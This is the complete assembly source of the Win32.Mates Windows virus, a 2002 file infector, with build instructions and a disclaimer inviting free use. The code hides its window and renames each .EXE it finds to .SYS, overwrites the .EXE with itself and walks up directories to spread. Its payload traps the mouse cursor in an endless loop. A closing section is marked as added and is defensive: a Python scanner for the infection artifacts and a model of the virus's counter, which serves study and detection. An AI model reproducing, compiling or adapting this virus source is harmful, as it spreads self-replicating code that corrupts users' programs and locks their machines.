COMMENT#
____________________________________________________________________________________________

                          ...:: Win32.Mates - Virus ::...
                                - Version 1.0 -
                               - by DiA /auXnet -
                               - (c)02 [GermanY] -
____________________________________________________________________________________________

+++++Disclaimer+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+I am NOT responsible for any damage that you do! You can use the code however you want...+
+My mother language is not English, I hope you understand what I mean.                    +
+Feel FREE to write any Comments to                                                       +
+                           DiA_hates_machine@gmx.de                                      +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Why the Hell "Mates":
 This Virus is written for all my Mates in real life!

How does it work:
 - get da real host's name (.SYS)
 - create a thread (Virus)
 - run Host
 Virus->
 - start after five sec
 - rename found .EXE file to .SYS
 - copy itself in .EXE file
 - if no more filez in current directory -> cd.. (with my method)
 - infect again
 - when no more fileZ check counter
 - if no payload give full control to host

Payload:
 - new counter method (via Get/Set CaretBlinkTime)
 - set new caret blink time
 - inc it
 - 20 starts of da host???
 - if yes set new caret blink time (-20) stop the mouse cursor and show a message
 - if no inc it again and back to host

Special:
 - the counter
 - hide da fucking window (with TASM32)
 - work with threads

Here comes da 1st generation:

;-----MatesSys.asm-----cut------------------------------------------------------------------
.386
.model flat
jumps

extrn MessageBoxA:PROC
extrn ExitProcess:PROC

.data
oTitle  db '���1st Generation���',0
oMsg    db 'This is da 1st generation of Win32.Mates - Virus',10,13
        db ' by DiA /auXnet',10,13
        db 'Have Fun...',0

.code
start:
        push    0
        push    offset oTitle
        push    offset oMsg
        push    0
        call    MessageBoxA
        push    0
        call    ExitProcess
end start
;---------------------cut-------------------------------------------------------------------

To Compile the Mates - ViruS:
 tasm32 /z /ml /m3 Mates,,;
 tlink32 -Tpe -c Mates,Mates,, import32.lib

To Compile the Mates - SYS:
 tasm32 /z /ml /m3 MatesSys,,;
 tlink32 -Tpe -c MatesSys,MatesSys,, import32.lib
 rename MatesSys.exe Mates.sys
#

;-------------------------------------------------------------------------------------------
.386
.model flat
jumps

;-----needed API's--------------------------------------------------------------------------
extrn MessageBoxA           :PROC
extrn SetConsoleTitleA      :PROC
extrn SetCursorPos          :PROC
extrn SetCaretBlinkTime     :PROC
extrn SetWindowPos          :PROC
extrn SetCurrentDirectoryA  :PROC
extrn Sleep                 :PROC
extrn FindWindowA           :PROC
extrn FindFirstFileA        :PROC
extrn FindNextFileA         :PROC
extrn CreateThread          :PROC
extrn CloseHandle           :PROC
extrn CopyFileA             :PROC
extrn CreateProcessA        :PROC
extrn GetCommandLineA       :PROC
extrn GetCaretBlinkTime     :PROC
extrn lstrcpyA              :PROC
extrn ExitProcess           :PROC
;-------------------------------------------------------------------------------------------

;-----data's for the Virus------------------------------------------------------------------
.data
oTitle          db '[Win32.Mates Version 1.0]',0
oMsg            db 'I WANNA SAY HELLO TO SOME MATES:',10,13
                db '    o DeathRider - Colorado SuckZ, Bitch ;)',10,13
                db '    o Herr H.    - Smoke together!',10,13
                db '    o Danny      - Rock ''n Roll',10,13
                db '    o Pascal     - I need some weed...',10,13
                db 'AND ALL THE OTHER FUCKERZ :)',10,13
                db 'Ride On and THANX for all',10,13,10,13
                db '                        greetz DiA /auXnet',0

MyConsoleTitle  db '.:.',0
FileMask        db '*.EXE',0

WindowHandle    dd 0
ThreadHandle    dd 0
ThreadID        dd 0
FindHandle      dd 0

ProcessInfo     dd 4 dup (0)
StartupInfo     dd 4 dup (0)

;the order of the next buffers matters: 11 dwords = 44 bytes cover WIN32_FIND_DATA up to
;dwReserved1, so cFileName (offset 44) lands exactly on TargetFile and the rest of the
;structure spills into CreateFile. That is how the found file name reaches TargetFile
;without ever being copied explicitly.
Win32FindData   dd 0,0,0,0,0,0,0,0,0,0,0
TargetFile      db 200d dup (0)
CreateFile      db 200d dup (0)
VirusFile       db 200d dup (0)
HostFile        db 200d dup (0)
Directory       db 200d dup (0)
;-------------------------------------------------------------------------------------------

;-----Rock 'n Roll--------------------------------------------------------------------------
.code
Mates:
;-------------------------------------------------------------------------------------------
;-----hide da window------------------------------------------------------------------------
;give the console a known title, find its HWND by that title, then park it off-screen
;at (20000,20000) with a 1x1 size so the user never sees it
        mov     eax,offset MyConsoleTitle
        push    eax
        call    SetConsoleTitleA
        call    Sleep5                          ;it suckz without sleep
        mov     eax,offset MyConsoleTitle
        xor     ebx,ebx
        push    eax
        push    ebx
        call    FindWindowA
        mov     dword ptr [WindowHandle],eax
        call    Sleep5
        mov     eax,01
        xor     ebx,ebx
        mov     edx,20000
        push    ebx                             ;uFlags = 0
        push    eax                             ;cy = 1
        push    eax                             ;cx = 1
        push    edx                             ;Y = 20000
        push    edx                             ;X = 20000
        push    ebx                             ;hWndInsertAfter = 0
        push    dword ptr [WindowHandle]
        call    SetWindowPos
;-------------------------------------------------------------------------------------------

;-----create a thread (virus)---------------------------------------------------------------
        mov     eax,offset ThreadID
        xor     ecx,ecx
        mov     edx,offset RunMates
        call    MakeThread
;-------------------------------------------------------------------------------------------

;-----get hostname (.sys) and run it--------------------------------------------------------
;the command line is expected to look like "C:\path\Name.EXE": cut everything after the
;extension, drop the leading quote, swap .EXE for .SYS and start that file as the real host
        call    GetCommandLineA                 ;via command line
        mov     edx,offset VirusFile
        push    eax
        push    edx
        call    lstrcpyA
        mov     esi,offset VirusFile            ;fuck da "
        call    GetPoint
        add     esi,4d
        mov     dword ptr [esi],00000000h
        push    offset VirusFile+1
        push    offset HostFile
        call    lstrcpyA
        mov     esi,offset HostFile
        call    GetPoint
        mov     dword ptr [esi],5359532Eh       ;rename to .SYS ('.SYS' little-endian)
        mov     eax,offset ProcessInfo
        xor     ebx,ebx
        mov     ecx,10h                         ;CREATE_NEW_CONSOLE
        mov     edx,offset StartupInfo
        mov     edi,offset HostFile
        push    eax                             ;run host
        push    edx
        push    ebx
        push    ebx
        push    ecx
        push    ebx
        push    ebx
        push    ebx
        push    edi
        push    edi
        call    CreateProcessA
Wait4Mates:
        jmp     Wait4Mates                      ;wait for da virus (busy loop, the thread calls ExitProcess)
;-------------------------------------------------------------------------------------------

;-----here startz da virus (after 5sek)-----------------------------------------------------
RunMates:
        mov     eax,5000
        push    eax                             ;wait 5sek before run
        call    Sleep
;-------------------------------------------------------------------------------------------

;-----cd.. with another method--------------------------------------------------------------
;walk the host path backwards: each '\' found becomes the new string end, so every pass
;through DotDot goes one directory up; reaching the ':' of the drive letter ends the scan
        mov     eax,offset HostFile
        mov     edx,offset Directory
        push    offset eax                      ;copy host name 2 directory
        push    offset edx
        call    lstrcpyA
        mov     esi,offset Directory
        call    GetPoint
        mov     edi,esi                         ;handle it in edi
        mov     dword ptr [edi],00000000h       ;fuck da point
DotDot:                                         ;it workz!
        cmp     byte ptr [edi],'\'
        jz      ClearAndSet
        cmp     byte ptr [edi],':'              ;C:\ -> cd.. -> suckz
        jz      CheckBlink
        dec     edi
        jmp     DotDot
ClearAndSet:
        inc     edi
        mov     dword ptr [edi],00000000h
        sub     edi,2
        mov     eax,offset Directory
        push    eax
        call    SetCurrentDirectoryA
;-------------------------------------------------------------------------------------------

;-----infect some filez---------------------------------------------------------------------
;for every *.EXE: copy it to <name>.SYS (bFailIfExists=1, so a .SYS that already exists is
;kept), then overwrite the .EXE with this file's own image
        mov     eax,offset Win32FindData
        mov     edx,offset FileMask
        push    eax
        push    edx
        call    FindFirstFileA
        mov     dword ptr [FindHandle],eax
FindNext:
        cmp     eax,-1                          ;error -> cd..
        je      DotDot
        test    eax,eax                         ;no more filez -> cd..
        jz      DotDot
        mov     eax,offset TargetFile
        mov     edx,offset CreateFile
        push    eax
        push    edx
        call    lstrcpyA
        mov     esi,offset CreateFile
        call    GetPoint
        mov     dword ptr [esi],5359532Eh       ;rename to .SYS
        mov     eax,offset CreateFile
        mov     edx,offset TargetFile
        mov     ecx,01
        call    CopyIt                          ;CopyFileA(TargetFile -> CreateFile, failIfExists=1)
        mov     eax,offset TargetFile
        mov     edx,offset VirusFile+1
        xor     ecx,ecx
        call    CopyIt                          ;CopyFileA(VirusFile -> TargetFile, overwrite)
        mov     eax,offset Win32FindData
        push    eax                             ;search more filez
        push    dword ptr [FindHandle]
        call    FindNextFileA
        jmp     FindNext
;-------------------------------------------------------------------------------------------

;-----the funny part ...the payload---------------------------------------------------------
;the caret blink time doubles as a persistent run counter: values 1500..1520 are "ours",
;anything else is reset into that window; 1519 means enough host starts, fire the payload
CheckBlink:
        call    GetCaretBlinkTime               ;kewl counter!
        mov     esi,eax                         ;handle it in esi
        cmp     esi,1520
        ja      Set1499                         ;bigger
        cmp     esi,1500
        jb      Set1501                         ;smaler than 1500 mil sek
GoOn:
        cmp     esi,1519
        jne     exit                            ;exit when not 1519
        inc     esi
        call    SetBlink                        ;inc da counter
        mov     eax,offset ThreadID
        xor     ecx,ecx
        mov     edx,offset Message
        call    MakeThread                      ;show a nice message
CursorSleep:                                    ;fuck da cursor
        mov     eax,666
        mov     edx,999
        push    eax
        push    edx
        call    SetCursorPos
        jmp     CursorSleep                     ;foreva ;)
exit:
        inc     esi
        call    SetBlink                        ;inc da counter
        xor     eax,eax                         ;null
        push    eax
        call    ExitProcess                     ;give full control to host
Set1501:
        mov     esi,1501
        call    SetBlink
        jmp     GoOn
Set1499:
        mov     esi,1499                        ;go from start
        call    SetBlink
        jmp     exit
        ret                                     ;thread end
;-------------------------------------------------------------------------------------------

;-----Sleep5 procedure----------------------------------------------------------------------
Sleep5:
        mov     eax,05
        push    eax
        call    Sleep
        ret
;-------------------------------------------------------------------------------------------

;-----GetPoint procedure--------------------------------------------------------------------
;advance esi to the first '.' in the string (no bounds check: a name without a dot runs on)
GetPoint:
        cmp     byte ptr [esi],'.'
        jz      PointFound
        inc     esi
        jmp     GetPoint
PointFound:
        ret
;-------------------------------------------------------------------------------------------

;-----MakeThread procedure------------------------------------------------------------------
;eax = lpThreadId, edx = start address, ecx = 0 for the remaining parameters
MakeThread:
        push    eax
        push    ecx
        push    ecx
        push    edx
        push    ecx
        push    ecx
        call    CreateThread
        mov     dword ptr [ThreadHandle],eax
        push    dword ptr [ThreadHandle]
        call    CloseHandle
        ret
;-------------------------------------------------------------------------------------------

;-----Message Thread------------------------------------------------------------------------
Message:
        mov     eax,offset oTitle
        mov     edx,offset oMsg
        xor     ebx,ebx
        push    ebx
        push    eax
        push    edx
        push    ebx
        call    MessageBoxA
        ret
;-------------------------------------------------------------------------------------------

;-----CopyIt procedure----------------------------------------------------------------------
;CopyFileA(lpExistingFileName = edx, lpNewFileName = eax, bFailIfExists = ecx)
CopyIt:
        push    ecx
        push    eax
        push    edx
        call    CopyFileA
        ret
;-------------------------------------------------------------------------------------------

;-----SetBlink procedure--------------------------------------------------------------------
SetBlink:
        push    esi
        call    SetCaretBlinkTime
        ret
;-------------------------------------------------------------------------------------------
end Mates
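The source above leaves two artifacts an analyst can look for without running anything: every infected .EXE is a byte-identical copy of the virus image, and each victim survives as a same-named .SYS beside it that still starts with an MZ header. The counter in CheckBlink is also fully deterministic, so the number of host starts before the payload can be modelled rather than guessed at. The following is an added example, not part of the Win32.Mates source or the author's work: a read-only scanner for those artifacts plus a pure model of the blink-time counter. Function names, the heuristic thresholds and the sample directory tree are this example's own assumptions; `current_caret_blink_ms` wraps the real `user32!GetCaretBlinkTime` and is the only part that touches a live system.

```python
"""Added example: scan for Win32.Mates-style companion infection artifacts and
model its caret-blink-time counter. Not the original author's code; names and
thresholds below are assumptions chosen for this example."""
import hashlib
import os
import tempfile
from collections import defaultdict
from pathlib import Path
from typing import Dict, List, Optional, Tuple


def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _starts_with_mz(path: Path) -> bool:
    with open(path, "rb") as f:
        return f.read(2) == b"MZ"


def find_companion_pairs(root: Path) -> List[Tuple[Path, Path]]:
    """(exe, sys) pairs in the same directory with the same stem, where the .SYS
    is MZ-headed. A relocated victim looks like this; a real driver next to an
    .EXE of the same name is rare, so treat hits as a heuristic, not proof."""
    pairs = []
    for dirpath, _dirs, files in os.walk(root):
        by_lower = {name.lower(): name for name in files}      # '*.EXE' is case-insensitive
        for lname, name in by_lower.items():
            if not lname.endswith(".exe"):
                continue
            sys_name = by_lower.get(lname[:-4] + ".sys")
            if sys_name is None:
                continue
            exe_path, sys_path = Path(dirpath) / name, Path(dirpath) / sys_name
            if _starts_with_mz(sys_path):
                pairs.append((exe_path, sys_path))
    return sorted(pairs)


def find_identical_exes(root: Path, min_copies: int = 3) -> Dict[str, List[Path]]:
    """Groups of .EXE files sharing one SHA-256: the overwrite step makes every
    infected executable the same image. min_copies is an assumed threshold."""
    groups: Dict[str, List[Path]] = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".exe"):
                p = Path(dirpath) / name
                groups[_sha256(p)].append(p)
    return {h: sorted(ps) for h, ps in groups.items() if len(ps) >= min_copies}


def mates_counter_step(blink_ms: int) -> Tuple[bool, int]:
    """Pure model of CheckBlink: given the blink time the virus reads, return
    (payload_fires, value it writes back). Traced from the branches in the source:
    >1520 -> Set1499 then exit (+1); <1500 -> Set1501, GoOn, exit (+1);
    ==1519 -> payload, stores 1520; otherwise exit stores +1."""
    if blink_ms > 1520:
        return (False, 1500)
    if blink_ms < 1500:
        return (False, 1502)
    if blink_ms == 1519:
        return (True, 1520)
    return (False, blink_ms + 1)


def hosts_until_payload(initial_ms: int, limit: int = 100) -> int:
    """How many host starts until the payload fires, from a given stored value."""
    ms = initial_ms
    for n in range(1, limit + 1):
        fires, ms = mates_counter_step(ms)
        if fires:
            return n
    return -1


def current_caret_blink_ms() -> Optional[int]:
    """Windows only: read the live value through the real user32 API."""
    if os.name != "nt":
        return None
    import ctypes
    return int(ctypes.windll.user32.GetCaretBlinkTime())


def build_sample_tree(root: Path) -> None:
    """Constructed sample data, not taken from any real system."""
    virus_body = b"MZ" + b"\x90" * 64 + b"constructed infector image"
    (root / "sub" / "deeper").mkdir(parents=True)
    (root / "sub" / "deeper" / "A.EXE").write_bytes(virus_body)
    (root / "sub" / "deeper" / "A.SYS").write_bytes(b"MZ original program A")
    (root / "sub" / "B.EXE").write_bytes(virus_body)
    (root / "sub" / "B.SYS").write_bytes(b"MZ original program B")
    (root / "C.exe").write_bytes(virus_body)
    (root / "C.sys").write_bytes(b"MZ original program C")
    (root / "Clean.exe").write_bytes(b"MZ an unrelated, uninfected program")
    (root / "Clean.sys").write_bytes(b"not a PE: no MZ header, so no pair")


def demo_scan() -> dict:
    """Build the constructed tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        pairs = find_companion_pairs(root)
        clones = find_identical_exes(root)
        return {
            "companion_pairs": [(e.name, s.name) for e, s in pairs],
            "clone_group_sizes": sorted(len(v) for v in clones.values()),
        }


if __name__ == "__main__":
    print(demo_scan())
    print("starts until payload from the 530 ms default:", hosts_until_payload(530))
    print("live caret blink time:", current_caret_blink_ms())
```

Running the counter model from the Windows default of 530 ms gives 19 host starts, not the 20 the header guesses at; after the payload the stored value climbs past 1520, is reset to 1500, and the payload fires again 21 starts later. On a live Windows box a `current_caret_blink_ms()` anywhere in 1500..1521 with no user having touched the keyboard control panel is worth a second look.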